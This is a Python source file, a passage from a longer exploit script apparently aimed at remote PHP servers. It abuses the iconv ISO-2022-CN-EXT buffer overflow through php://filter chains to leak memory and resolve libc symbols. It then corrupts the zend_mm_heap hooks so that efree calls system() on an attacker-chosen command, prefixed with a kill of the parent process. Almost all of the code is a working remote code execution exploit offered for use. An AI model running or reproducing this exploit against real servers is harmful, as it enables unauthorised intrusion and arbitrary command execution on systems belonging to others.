            f"Expected {number_expected:03x} but got {number_quartets:03x}"
        )
        raise UnexpectedBytesException()
def build_conserved_chunks(
    self, buckets: list[bytes], dechunks: int = 0, step: int = 1
) -> bytes:
    """Builds a list of chunks that will be conserved during the exploit.

    Each bucket is wrapped in `step - 1` russian_doll layers so it only
    "hatches" at the right filter step. If `dechunks` is non-zero, a
    chunked-encoding prefix/suffix is added so the group also survives that
    many extra dechunk passes.
    """
    total_size = sum(map(len, buckets))
    prefix = ""
    suffix = b""
    wraps = [0] * (step - 1)
    for i in range(dechunks):
        # Each surviving dechunk layer adds an 8-byte size header ("xxxxxx\n")
        current_size = i * 8 + total_size
        prefix = f"{current_size:06x}\n" + prefix
        suffix += b"\n"
    prefix = prefix.encode()
    # NOTE(review): nesting reconstructed from a whitespace-mangled source;
    # wrapping the suffix only when a prefix exists keeps dechunks=0 calls
    # from appending a spurious compressed empty bucket — confirm upstream.
    if prefix:
        prefix = self.russian_doll(prefix, *wraps)
        suffix = self.russian_doll(suffix, *wraps)
    middle = b"".join(self.russian_doll(bucket, *wraps) for bucket in buckets)
    return prefix + middle + suffix
def find_zval_ptr_dtor(self) -> None:
    """Finds the address of the `_zval_ptr_dtor` function in memory. To do so, we
    look for a page that contains `zend_array` structures, and then we look for the
    `pDestructor` field of the structure.
    """
    assert self.zval_ptr_dtor is None
    skip_until = 0
    heap = MemoryDumper(self, self.heap)
    for page in track(range(1, 512), "Looking for a [i]zend_array[/] page"):
        if page < skip_until:
            continue
        # Offset of this page's descriptor in the chunk's page map
        offset = -0x40 + 0x0208 + 4 * page
        (page_type,) = heap.dump(offset + 3, 1)
        if page_type == 0x40:
            # Large allocation: skip all the pages it spans
            (nb_pages,) = heap.unpack(offset, "<H")
            skip_until = page + nb_pages
            self.logger.debug(
                f"Heap parsing, page #{page}: big allocation of {nb_pages} pages"
            )
        elif page_type == 0x80:
            self.logger.debug(f"Heap parsing, page #{page}: small allocation")
            # Find a page that contains arrays (0x38 has bin number 6)
            value = heap.expect(offset, b"\x06")
            if value:
                self.logger.info(f"Heap parsing, page #{page}: 0x38 page")
                msg_info(
                    f"Found first [i]zend_array (0x38)[/] page at [i]#{page}[/]"
                )
                page = heap.offset(-0x40 + PAGE_SIZE * page)
                break
    else:
        failure("Unable to find [i]zend_array[/] page")
    for p in track(range(0, 0x1000, 0x38), "Looking for [i]_zval_ptr_dtor[/]"):
        # Check that the structure has type 7 (IS_ARRAY)
        # NOTE(review): the return value of expect() is ignored here, unlike
        # the `if value:` use above — confirm whether expect() raises on
        # mismatch or whether this check is a no-op.
        page.expect(p+4, b"\x07\x00\x00\x00")
        # Extract the last pointer, pDestructor
        (pointer,) = page.unpack(p + 0x30, "<Q")
        self.logger.trace(f"Found potential zend_array, pDestructor: {pointer:#x}")
        # Presumably 0x7f.. (libraries/stack) and 0x55/0x56 (PIE binary)
        # top bytes mark a plausible code pointer — confirm
        if pointer >> 40 in (0x7F, 0x55, 0x56):
            msg_info(f"Found [i]_zval_ptr_dtor[/]: {addr(pointer)} {option_help('-z')}")
            break
    else:
        failure("Unable to find [i]zval_ptr_dtor[/] in main heap")
    self.zval_ptr_dtor = pointer
def _find_elf_header(self, address: int, min: int, max: int) -> int:
    """Finds the ELF header of a file given a function pointer, walking page
    by page downwards between `min` and `max` pages below it.

    NOTE(review): `min`/`max` shadow the builtins; names kept so positional
    and keyword callers keep working.
    """
    md = MemoryDumper(self, 0)
    # Align down to the containing page before scanning backwards
    start = address & ~(PAGE_SIZE - 1)
    for distance in track(range(min, max), "Looking for ELF header"):
        page = start - PAGE_SIZE * distance
        if md.expect(page, b"\x7fELF"):
            break
    else:
        failure("Unable to find ELF header")
    return page
def find_php_elf(self) -> None:
    """Finds the PHP ELF file in memory. To do so, we find the first 0x38 page in
    the heap. We expect it to contain zend_arrays, and therefore their PDestructor
    field, which points to zval_ptr_dtor. We then look for the ELF header page by
    page, starting from zval_ptr_dtor. It takes ages, and is actually what prompted
    the implementation of the FAST_PATH.
    """
    assert self.php_elf is None
    address = self._find_elf_header(self.zval_ptr_dtor, PHP_ELF_MIN_PAGE_DISTANCE, PHP_ELF_MAX_PAGE_DISTANCE)
    msg_success(f"Found PHP ELF header at {addr(address)} {option_help('-p')}")
    self.php_elf = address
def execute(self) -> None:
    """Builds and sends the final filter chain that corrupts the heap and calls
    system().

    On each step of the exploit, a filter will process each chunk one after the
    other. Processing generally involves making some kind of operation either
    on the chunk or in a destination chunk of the same size. Each operation is
    applied on every single chunk; you cannot make PHP apply iconv on the first 10
    chunks and leave the rest in place. That's where the difficulties come from.

    Keep in mind that we know the address of the main heap, and the libraries.
    ASLR/PIE do not matter here.

    The idea is to use the bug to make the freelist for chunks of size 0x100 point
    lower. For instance, we have the following free list:

        ... -> 0x7fffAABBCC900 -> 0x7fffAABBCCA00 -> 0x7fffAABBCCB00

    By triggering the bug from chunk ..900, we get:

        ... -> 0x7fffAABBCCA00 -> 0x7fffAABBCCB48 -> ???

    That's step 3.

    Now, in order to control the free list, and make it point whereever we want,
    we need to have previously put a pointer at address 0x7fffAABBCCB48. To do so,
    we'd have to have allocated 0x7fffAABBCCB00 and set our pointer at offset 0x48.
    That's step 2.

    Now, if we were to perform step2 an then step3 without anything else, we'd have
    a problem: after step2 has been processed, the free list goes bottom-up, like:

        0x7fffAABBCCB00 -> 0x7fffAABBCCA00 -> 0x7fffAABBCC900

    We need to go the other way around. That's why we have step 1: it just allocates
    chunks. When they get freed, they reverse the free list. Now step2 allocates in
    reverse order, and therefore after step2, chunks are in the correct order.

    Another problem comes up.

    To trigger the overflow in step3, we convert from UTF-8 to ISO-2022-CN-EXT.
    Since step2 creates chunks that contain pointers and pointers are generally not
    UTF-8, we cannot afford to have that conversion happen on the chunks of step2.
    To avoid this, we put the chunks in step2 at the very end of the chain, and
    prefix them with `0\\n`. When dechunked (right before the iconv), they will
    "disappear" from the chain, preserving them from the character set conversion
    and saving us from an unwanted processing error that would stop the processing
    chain.

    After step3 we have a corrupted freelist with an arbitrary pointer into it. We
    don't know the precise layout of the heap, but we know that at the top of the
    heap resides a zend_mm_heap structure. We overwrite this structure in two ways.
    Its free_slot[] array contains a pointer to each free list. By overwriting it,
    we can make PHP allocate chunks whereever we want. In addition, its custom_heap
    field contains pointers to hook functions for emalloc, efree, and erealloc
    (similarly to malloc_hook, free_hook, etc. in the libc). We overwrite them and
    then overwrite the use_custom_heap flag to make PHP use these function pointers
    instead. We can now do our favorite CTF technique and get a call to
    system(<chunk>).

    We make sure that the "system" command kills the current process to avoid other
    system() calls with random chunk data, leading to undefined behaviour.

    The pad blocks just "pad" our allocations so that even if the heap of the
    process is in a random state, we still get contiguous, in order chunks for our
    exploit.

    Therefore, the whole process described here CANNOT crash. Everything falls
    perfectly in place, and nothing can get in the middle of our allocations.
    """
    # Hook targets: emalloc/erealloc keep working, but efree becomes system(),
    # so the first efree(chunk) runs system(chunk).
    ADDR_EMALLOC = self.malloc
    ADDR_EFREE = self.system
    ADDR_EREALLOC = self.realloc
    # Offsets into the zend_mm_heap structure sitting at the top of the heap
    ADDR_HEAP = self.heap
    ADDR_FREE_SLOT = ADDR_HEAP + 0x20
    ADDR_CUSTOM_HEAP = ADDR_HEAP + 0x0168
    # The fake bin lands 0x10 bytes before free_slot[] (see step4_pwn below)
    ADDR_FAKE_BIN = ADDR_FREE_SLOT - 0x10
    # Chunk size targeted by the attack (0x100 free list)
    CS = 0x100
    # Pad needs to stay at size 0x100 at every step
    pad_size = CS - 0x18
    pad = b"\x00" * pad_size
    pad = self.russian_doll(pad, -6, -6, -6)
    # Step 1: tiny allocations whose frees reverse the free-list order
    step1_size = 1
    step1 = b"\x00" * step1_size
    step1 = self.russian_doll(step1, 0, 0, CS)
    # Since these chunks contain non-UTF-8 chars, we cannot let it get converted to
    # ISO-2022-CN-EXT. We add a `0\n` that makes the 4th and last dechunk "crash"
    step2_size = 0x48
    step2 = b"\x00" * (step2_size + 8)
    step2 = self.russian_doll(step2, CS, 0)
    # This chunk plants the fake free-list pointer at offset 0x48
    step2_write_ptr = b"0\n".ljust(step2_size, b"\x00") + p64(ADDR_FAKE_BIN)
    step2_write_ptr = self.russian_doll(step2_write_ptr, CS, 0)
    # Step 3: chunk ending with BUG triggers the iconv buffer overflow
    step3_size = CS
    step3_overflow = b"\x00" * (step3_size - len(BUG)) + BUG
    assert len(step3_overflow) == CS
    step3_overflow = self.russian_doll(step3_overflow, 0, 0, 0)
    # Step 4 chunks start with `=00` so quoted-printable-decode shrinks them
    step4_size = CS
    step4 = b"=00" + b"\x00" * (step4_size - 1)
    step4 = self.russian_doll(step4, 0, 0, 0)

    def ptr_bucket(*ptrs, size=None) -> bytes:
        """Creates a 0x8000 chunk that reveals pointers after every step has been ran."""
        if size is not None:
            assert len(ptrs) * 8 == size
        bucket = b"".join(map(p64, ptrs))
        # Pointers survive the chain as quoted-printable until step 4 decodes them
        bucket = qpe(bucket)
        bucket = self.russian_doll(bucket, 0, 0, 0)
        return bucket

    # This chunk will eventually overwrite mm_heap->free_slot
    # it is actually allocated 0x10 bytes BEFORE it, thus the two filler values
    step4_pwn = ptr_bucket(
        0x200000,
        0,
        # free_slot
        0,
        0,
        ADDR_CUSTOM_HEAP,  # 0x18
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        ADDR_HEAP,  # 0x140
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        size=CS,
    )
    # Fake custom_heap: {emalloc, efree=system, erealloc} hook pointers
    step4_custom_heap = ptr_bucket(
        ADDR_EMALLOC, ADDR_EFREE, ADDR_EREALLOC, size=0x18
    )
    # The command chunk is allocated from the 0x140 bin (use_custom_heap path)
    step4_use_custom_heap_size = 0x140
    COMMAND = self.command
    # Kill PHP first so no further efree()s run system() on garbage chunks
    COMMAND = f"kill -9 $PPID; {COMMAND}"
    if self.sleep:
        COMMAND = f"sleep {self.sleep}; {COMMAND}"
    COMMAND = COMMAND.encode() + b"\x00"
    assert (
        len(COMMAND) <= step4_use_custom_heap_size
    ), f"Command too big ({len(COMMAND)}), it must be strictly inferior to {hex(step4_use_custom_heap_size)}"
    COMMAND = COMMAND.ljust(step4_use_custom_heap_size, b"\x00")
    step4_use_custom_heap = COMMAND
    step4_use_custom_heap = qpe(step4_use_custom_heap)
    step4_use_custom_heap = self.russian_doll(step4_use_custom_heap, 0, 0, 0)
    # Assemble the payload: order matters, chunks are consumed front to back
    pages = (
        step4 * 3
        + step4_pwn
        + step4_custom_heap
        + step4_use_custom_heap
        + step3_overflow
        + pad * 20
        + step1 * 3
        + step2_write_ptr
        + step2 * 2
    )
    resource = self._data_to_resource(pages)
    filters = [
        # Create buckets
        "zlib.inflate",
        "zlib.inflate",
        # Step 0: Setup heap
        "dechunk",
        "convert.iconv.L1.L1",
        # Step 1: Reverse FL order
        "dechunk",
        "convert.iconv.L1.L1",
        # Step 2: Put fake pointer and make FL order back to normal
        "dechunk",
        "convert.iconv.L1.L1",
        # Step 3: Trigger overflow
        "dechunk",
        "convert.iconv.UTF-8.ISO-2022-CN-EXT",
        # Step 4: Allocate at arbitrary address and change zend_mm_heap
        "convert.quoted-printable-decode",
        "convert.iconv.L1.L1",
    ]
    filters = "|".join(filters)
    path = f"php://filter/read={filters}/resource={resource}"
    start = time.time()
    try:
        self.remote.oracle(path)
    except:
        # Deliberately broad: killing PHP mid-request commonly breaks the
        # HTTP exchange, so an exception here may actually mean success.
        self.logger.exception("The oracle raised an exception (although that could be normal)")
    msg_print()
    if not self.sleep:
        msg_print(Align.center("[b white on black] EXPLOIT [/][b white on green] SUCCESS [/] [i](probably)[/]"))
    elif start + self.sleep <= time.time():
        # The injected `sleep` ran, so the command executed for sure
        msg_print(Align.center("[b white on black] EXPLOIT [/][b white on green] SUCCESS [/]"))
    else:
        msg_print(Align.center("[b white on black] EXPLOIT [/][b white on red] FAILURE [/]"))
    msg_print()
@dataclass
class LinkedBruteforcer(Bruteforcer):
    """Bruteforcer that prefixes every request with the exploit's filter chain,
    keeping the PHP heap layout identical across probes.

    NOTE(review): relies on `FILTER_USAGE` being defined by the parent
    `Bruteforcer` class — confirm against the oracle library.
    """

    exploit: Exploit     # exploit instance providing the oracle
    filters: list[str]   # filter chain prefixed to every probe
    resource: str        # resource (file) the filter chain reads
    HEADER = ""          # no banner output for this bruteforcer

    def __post_init__(self) -> None:
        # Parent __init__ expects a requestor; 0 because we route through
        # self.exploit.oracle() instead (see send())
        super().__init__(0)
        self.logger = logger(self.__class__.__name__)

    @classmethod
    def compute_write(cls, filters: list[str]) -> str:
        """To make sure that the heap does not change too much, we add dummy filters so
        that PHP creates the associated structures. They do not impact our exploit, as
        they are write filters. However, they will be called when the stream is finally
        freed, at the end of the execution. We thus convert any funky charset to latin1,
        to make sure PHP does not report errors. This also makes sure that the length of
        the path is always the same.

        Although this is very helpful, this is not perfect. The order in which the
        filters are created matters as well. However, we cannot control this perfectly.
        """
        filters = Counter(filters)
        missing = []
        for filter, number in cls.FILTER_USAGE.items():
            # Count usage against the ORIGINAL filter name, before any rewrite
            used = filters.get(filter, 0)
            if filter.startswith("convert.iconv."):
                _, _, ffrom, fto = filter.split(".")
                # Replace each charset with "L1" space-padded to the same width,
                # so the rewritten filter name keeps the exact same length
                if len(ffrom) >= 2:
                    ffrom = "L1".ljust(len(ffrom), " ")
                if len(fto) >= 2:
                    fto = "L1".ljust(len(fto), " ")
                filter = f"convert.iconv.{ffrom}.{fto}"
            if used < number:
                missing += [filter] * (number - used)
        # assert (Counter(missing) + Counter(filters) == Counter(cls.FILTER_USAGE))
        return "|".join(missing)

    def send(self, filters: str) -> bool:
        """Sends a filter chain with the given filters, and returns True if the
        expansion happened.
        """
        # Drop empty entries produced by stray "|" separators
        filters = [filter for filter in filters.split("|") if filter]
        filters = self.filters + filters
        return self.exploit.oracle(filters, self.resource)
def put(buffer: bytearray, position: int, data: bytes) -> None:
    """Overwrites `len(data)` bytes of *buffer* in place at *position*.

    A negative *position* counts from the end of the buffer, like normal
    Python indexing.
    """
    index = position if position >= 0 else len(buffer) + position
    buffer[index : index + len(data)] = data
@dataclass
class MemoryDumper:
    """Wraps the exploit's memory primitives with a base offset, so that
    structures can be read using addresses relative to `base`.
    """

    exploit: Exploit  # exploit instance providing dump/expect primitives
    base: int         # absolute address added to every relative address
    log = logger("MemoryDumper")

    def dump(self, address: int, size: int, message: str | None = None) -> bytes:
        """Dumps `size` bytes at `base + address`."""
        address += self.base
        self.log.debug(f"Dumping memory at {address:#x} for {size:#x} bytes")
        return self.exploit.dump_memory(address, size, message=message)

    def expect(self, address: int, expected: bytes) -> bool:
        """Returns whether memory at `base + address` equals `expected`."""
        address += self.base
        self.log.debug(f"Dumping memory at {address:#x} expecting {expected.hex()}")
        return self.exploit.expect_memory(address, expected)

    def unpack(self, address: int, format: str, message: str | None = None) -> tuple:
        """Dumps and struct-unpacks memory at `base + address` using `format`."""
        data = self.dump(address, struct.calcsize(format), message=message)
        return struct.unpack(format, data)

    def offset(self, address: int) -> MemoryDumper:
        """Returns a new dumper whose base is shifted by `address`."""
        return MemoryDumper(self.exploit, self.base + address)
@dataclass
class ELFDumper(MemoryDumper):
    """Provides helpers to dump an ELF file from memory.

    Parses the program headers, the dynamic section and the GNU hash table of
    an in-memory ELF (x64, little-endian) to resolve symbol addresses while
    dumping as few bytes as possible, since every dumped byte costs oracle
    requests.
    """

    # Program header types
    DT_NEEDED = 1
    DT_DYNAMIC = 2
    # Dynamic segment types
    DT = {
        "STRTAB": 0x05,
        "SYMTAB": 0x06,
        "JMPREL": 0x17,
        "GNU_HASH": 0x6FFFFEF5,
    }
    # Dumper positioned on the dynamic section (filled by get_dynamic_section)
    dynamic_section: MemoryDumper = field(init=False)
    # Dumpers positioned on each resolved segment, keyed by DT name
    segments: dict[str, MemoryDumper] = field(init=False, default_factory=dict)
    # GNU hash table layout (filled by parse_gnu_hash)
    gnu_hash_info: dict[str, int] | None = field(init=False, default=None)

    def identify(self) -> None:
        """Verifies the ELF magic and that the file is x64 little-endian."""
        self.expect(0, b"\x7fELF")
        self.expect(5, b"\x02")  # x64
        self.expect(6, b"\x01")  # little endian

    def setup_gnu_hash(self) -> None:
        """Resolves the segments required for GNU-hash symbol lookups."""
        self.get_dynamic_section()
        self.get_dynamic_segments("STRTAB", "SYMTAB", "GNU_HASH")
        self.parse_gnu_hash()

    def find_some_libc_function(self) -> int:
        """Finds the address of a libc function in the JMPREL section.

        Walks .rela.plt entries, reconstructs each symbol name 3 bytes at a
        time, and returns the GOT value of the first name that matches a known
        libc function.
        """
        rela = self.segments["JMPREL"]
        symtab = self.segments["SYMTAB"]
        strtab = self.segments["STRTAB"]
        libc_functions = to_bytes(table.read("libc-functions.list"))
        # Go through the .rela.plt section looking for a function name that matches
        # one of the libc functions
        for i in track(range(0, 0x2000, 0x18), "Looking for a libc function in the [i]JMPREL[/] section"):
            # the 4 MSB of r_info are the index of the symbol in the symbol table
            r_info, = rela.unpack(i + 8 + 4, "<I")
            # offset of the name in the str table
            # (only 3 bytes dumped: assumes strtab offsets fit in 0xffffff)
            st_name = u32(symtab.dump(0x18 * r_info, 3) + b"\x00")
            # Dump 3 characters at a time until we find a null byte
            # If at any point, the name cannot be a libc function, bail out
            name = b""
            while any(libc_function.startswith(name) for libc_function in libc_functions):
                name += strtab.dump(st_name + len(name), 3)
                if (end := name.find(b"\x00")) != -1:
                    name = name[:end]
                    break
            if name in libc_functions:
                break
        else:
            failure("Could not find any libc function in the [i]JMPREL[/] section")
        name = name.decode()
        with msg_status(f"Dumping address of [i]{name}@libc[/]"):
            # NOTE(review): Elf64 r_offset is 8 bytes; only the low 4 are read,
            # presumably because PIE offsets fit in 32 bits — confirm
            r_offset, = rela.unpack(i + 0, "<I")
            address, = self.unpack(r_offset, '<Q')
        msg_success(f"Found libc function: [i]{name}[/] at {addr(address)}")
        return address

    def get_symbol(self, name: str) -> int:
        """Go through .dynsym to find a symbol. Slow.

        Returns the st_value of the first symbol whose name matches.
        """
        name = name.encode() + b"\x00"
        symtab = self.segments["SYMTAB"]
        strtab = self.segments["STRTAB"]
        for symbol in itertools.count(0, 0x18):
            # We expect strtab to be of size 0xffffff or less, and thus only dump 3
            # bytes. This reduces the time required to find the symbol.
            st_name = u32(symtab.dump(symbol, 3) + b"\x00")
            if strtab.expect(st_name, name):
                st_value, = symtab.unpack(symbol + 8, '<Q')
                msg_info(f"Got address of symbol {name}: {st_value:#x}")
                return st_value

    def get_dynamic_section(self) -> None:
        """Finds DT_DYNAMIC in the program headers and obtains its virtual offset."""
        with msg_status("Parsing ELF header"):
            (e_phoff,) = self.unpack(0x20, "<Q")
            e_phentsize, e_phnum = self.unpack(0x36, "<HH")
        msg_info(f"ELF contains [i]{e_phnum}[/] program headers")
        self.log.info(
            f"Got {e_phnum} program headers in ELF, at offset {e_phoff:#x}, size {e_phentsize:#x}"
        )
        for i in track(
            range(e_phnum), "Looking for the [i]DT_DYNAMIC[/] program header"
        ):
            program_header = e_phoff + i * e_phentsize
            # TODO CAREFUL about the endianness
            # TODO Careful about PIEness
            if self.expect(program_header, p32(self.DT_DYNAMIC)):
                break
        else:
            failure("[i]DT_DYNAMIC[/] program header not found")
        msg_info(f"Found [i]DT_DYNAMIC[/] program header at offset {addr(program_header)}")
        with msg_status("Parsing [i]DT_DYNAMIC[/] program header"):
            (p_vaddr,) = self.unpack(program_header + 0x10, "<Q")
            # Truncating to 4 bytes only, the size should not be bigger
            (p_memsz,) = self.unpack(program_header + 0x28, "<I")
        msg_info(f"Got virtual offset for [i]DT_DYNAMIC[/] at {addr(p_vaddr)}, size {p_memsz:#x}")
        self.dynamic_section = self.offset(p_vaddr)
        self.dynamic_section.size = p_memsz

    def parse_gnu_hash(self) -> None:
        """Parses the GNU hash table to find the address of a symbol."""
        # Read the GNU hash table header
        with msg_status("Dumping [i]GNU_HASH[/] header"):
            nbuckets, symndx, maskwords, shift2 = self.segments["GNU_HASH"].unpack(0, "<IIII")
        msg_info(
            f"Got [i]GNU_HASH[/] header: nbuckets={nbuckets}, symndx={symndx}, maskwords={maskwords}, shift2={shift2}"
        )
        # Calculate the addresses of the bloom filter, hash buckets, and hash values
        # Layout: 16-byte header, then maskwords 8-byte bloom words, then
        # nbuckets 4-byte buckets, then the 4-byte hash values
        bloom_filter_offset = 16
        hash_buckets_offset = bloom_filter_offset + (maskwords * 8)
        hash_values_offset = hash_buckets_offset + (nbuckets * 4)
        # msg_info(f"Bloom filter offset: {bloom_filter_offset:#x}")
        # msg_info(f"Hash buckets offset: {hash_buckets_offset:#x}")
        # msg_info(f"Hash values offset: {hash_values_offset:#x}")
        self.gnu_hash_info = {
            "nbuckets": nbuckets,
            "symndx": symndx,
            "maskwords": maskwords,
            "shift2": shift2,
            "bloom_filter_addr": bloom_filter_offset,
            "hash_buckets_offset": hash_buckets_offset,
            "hash_values_offset": hash_values_offset,
        }

    def get_dynamic_segments(self, *entries: str) -> None | NoReturn:
        """Looks for tags in the dynamic section.

        Fills `self.segments` with a MemoryDumper for each requested entry, or
        aborts the exploit if any entry is missing.
        """
        ds = self.dynamic_section
        # Iterate through the dynamic section, looking for specific entries
        # TODO We didn't dump the size, so we might iterate endlessly if an entry is not
        # found
        for element in track(range(0, ds.size, 0x10), "Looking for interesting dynamic segments"):
            # We cheat and only dump 1 byte instead of the 8 constituting the tag.
            (d_tag_lsb,) = ds.dump(element, 1)
            for entry in entries:
                if entry in self.segments:
                    continue
                if d_tag_lsb == self.DT[entry] & 0xFF:
                    break
            else:
                continue
            (d_val,) = ds.unpack(element + 8, "<Q")
            msg_info(f"Got address for [i]{entry}[/] at {addr(d_val)}")
            self.segments[entry] = MemoryDumper(self.exploit, d_val)
            if all(item in self.segments for item in entries):
                break
        else:
            missing = ", ".join(f"[i]{entry}[/]" for entry in set(entries) - set(self.segments))
            failure(f"Could not find {missing} segments in dynamic section")

    def compute_hash(self, name: str) -> int:
        """Computes the bloom hash of the given symbol name."""
        # djb2-style hash used by the GNU hash section
        h = 5381
        for c in name:
            h = (h << 5) + h + ord(c)
        return h & 0xFFFFFFFF

    def find_symbol_from_hash(self, name: str) -> int:
        """Finds the address of the given symbol name using the GNU_HASH section.

        Much faster than get_symbol(): only the bucket's hash chain is walked.
        Raises ValueError if the symbol is not present.
        """
        gh = self.segments["GNU_HASH"]
        symtab = self.segments["SYMTAB"]
        strtab = self.segments["STRTAB"]
        with msg_status(f"Looking for address of [i]{name}[/] using [i]GNU_HASH[/]"):
            gnu_hash_info = self.gnu_hash_info
            nbuckets = gnu_hash_info["nbuckets"]
            symndx = gnu_hash_info["symndx"]
            hash_buckets_offset = gnu_hash_info["hash_buckets_offset"]
            hash_values_offset = gnu_hash_info["hash_values_offset"]
            # Compute the hash of the symbol name
            hash = self.compute_hash(name)
            bname = name.encode() + b"\x00"
            bucket = hash % nbuckets
            # Get the symbol index from the hash bucket
            sym_index_offset = hash_buckets_offset + (bucket * 4)
            (sym_index,) = gh.unpack(sym_index_offset, "<I")
            if sym_index == 0:
                raise ValueError(f"Symbol {name} not found")
            # Iterate through the hash values to find the symbol
            for i in itertools.count(sym_index, 1):
                hash_value_addr = hash_values_offset + ((i - symndx) * 4)
                (hash_value,) = gh.unpack(hash_value_addr, "<I")
                # Low bit is the end-of-chain marker, so compare without it
                if (hash_value & ~1) == (hash & ~1):
                    (st_name,) = symtab.unpack(i * 24, "<I")
                    # msg_debug(
                    #     f"Found symbol {name} at index {st_name:#x} with hash {hash_value:#x}"
                    # )
                    if strtab.expect(st_name, bname):
                        (st_value,) = symtab.unpack((i * 24) + 8, "<Q")
                        # msg_success(
                        #     f"Got address of symbol [i]{name}[/]: {addr(st_value)}"
                        # )
                        return st_value
                if hash_value & 1:
                    break
            raise ValueError(f"Symbol {name} not found")
class UnexpectedBytesException(Exception):
    """Raised when dumped memory does not match the bytes that were expected."""
def compress(data: bytes) -> bytes:
    """Returns compressed data, suitable for `zlib.inflate`.

    Uses a raw DEFLATE stream (negative wbits) so no zlib header or Adler-32
    checksum is emitted, which is what PHP's `zlib.inflate` filter expects.
    """
    # NOTE This does not decompress properly in some cases. I don't know why.
    compressor = zlib.compressobj(level=9, wbits=-15, memLevel=9)
    return compressor.compress(data) + compressor.flush()
def b64(data: bytes, misalign=True) -> bytes:
    """Base64-encodes *data*. If *misalign* is False, raises ValueError when
    the encoding would end with `=` padding (i.e. is not 3-byte aligned).

    NOTE(review): the stdlib `base64` module has no `encode(bytes) -> str`
    signature — this presumably relies on `from ten import *` shadowing
    `base64` with ten's transform module (HEAD imports stdlib base64 first,
    then star-imports ten). Confirm before refactoring.
    """
    payload = base64.encode(data)
    if not misalign and payload.endswith("="):
        raise ValueError(f"Misaligned: {data}")
    return payload.encode()
def compressed_bucket(data: bytes) -> bytes:
    """Returns a chunk of size 0x8000 that, when dechunked, returns the data."""
    BUCKET_SIZE = 0x8000
    return chunked_chunk(data, BUCKET_SIZE)
def qpe(data: bytes) -> bytes:
    """Emulates quoted-printable-encode."""
    # Every byte becomes `=XX` with uppercase hex digits
    encoded = "".join(f"={byte:02x}" for byte in data)
    return encoded.upper().encode()
def chunked_chunk(data: bytes, size: int = None) -> bytes:
    """Constructs a chunked representation of the given chunk. If size is given, the
    chunked representation has size `size`.

    For instance, `ABCD` with size 10 becomes: `0004\nABCD\n`.
    """
    # The caller does not care about the size: let's just add 8, which is more than
    # enough
    if size is None:
        size = len(data) + 8
    # Zero-pad the hex length so the whole chunk is exactly `size` bytes
    occupied = len(data) + len(b"\n\n")
    header = f"{len(data):x}".rjust(size - occupied, "0")
    return header.encode() + b"\n" + data + b"\n"
def option_help(name: str) -> str:
    """Returns a string that can be used to display the help for the given option."""
    return "[black](" + name + ")[/]"
def addr(address: int) -> str:
    """Formats an address as magenta-colored hex for rich output."""
    return "[magenta]" + hex(address) + "[/]"
class Filters:
    """A collection of filters used in the exploit."""

    # Byte-order swap within 2-byte / 4-byte units
    REV_2 = "convert.iconv.UTF-16LE.UTF-16BE"
    REV_4 = "convert.iconv.UCS-4LE.UCS-4"
    # Prepends 3 bytes to the stream
    ADD3 = [
        "convert.base64-encode",
        "convert.iconv.UTF8.CSISO2022KR",
        "convert.base64-decode",
        "convert.base64-encode",
        "convert.iconv.JS.UNICODE",
        "convert.iconv.L4.UCS2",
        "convert.base64-decode",
        "convert.base64-encode",
        "convert.iconv.UTF8.CSISO2022KR",
        "convert.base64-decode",
        "convert.base64-encode",
        "convert.iconv.UTF8.CSISO2022KR",
        "convert.base64-decode",
    ]
    # Drops 4 bytes from the stream
    DITCH_4 = (
        ADD3
        + [REV_4]
        + ADD3
        + ["convert.base64-decode", "convert.base64-encode"]
        + [REV_2]
    )
    # Strips `=` padding characters via a UTF7 round-trip
    REMOVE_EQUALS = [
        "convert.iconv.L1.UTF7",
        "convert.base64-decode",
        "convert.base64-encode",
    ]
    # Filter combinations to isolate each digit of a quartet
    QUARTET_DIGITS = [
        [],  # 1
        [REV_2],  # 2
        [REV_4, REV_2],  # 3
        [REV_4],  # 4
    ]

    @staticmethod
    def base(mid: int) -> list:
        """Gets a list of base filters. `mid` indicates the number of times we dechunk
        into L1.
        """
        inflate = ["zlib.inflate", "zlib.inflate"]
        dechunk_l1 = ["dechunk", "convert.iconv.L1.L1"] * mid
        trigger = ["dechunk", "convert.iconv.UTF-8.ISO-2022-CN-EXT"]
        return inflate + dechunk_l1 + trigger
def p64(value):
    """Packs an integer as 8 little-endian bytes."""
    return struct.pack("<Q", value)
def u64(value):
    """Unpacks 8 little-endian bytes into an integer."""
    (result,) = struct.unpack("<Q", value)
    return result
def p32(value):
    """Packs an integer as 4 little-endian bytes."""
    return struct.pack("<I", value)
def u32(value):
    """Unpacks 4 little-endian bytes into an integer."""
    (result,) = struct.unpack("<I", value)
    return result
def unhex(value: str) -> int:
    """Converts an hex string (with or without `0x` prefix) to an integer."""
    return int(value, base=16)
# Run the exploit only when invoked as a script (ten entry-point class),
# not when this module is imported.
if __name__ == "__main__":
    Exploit()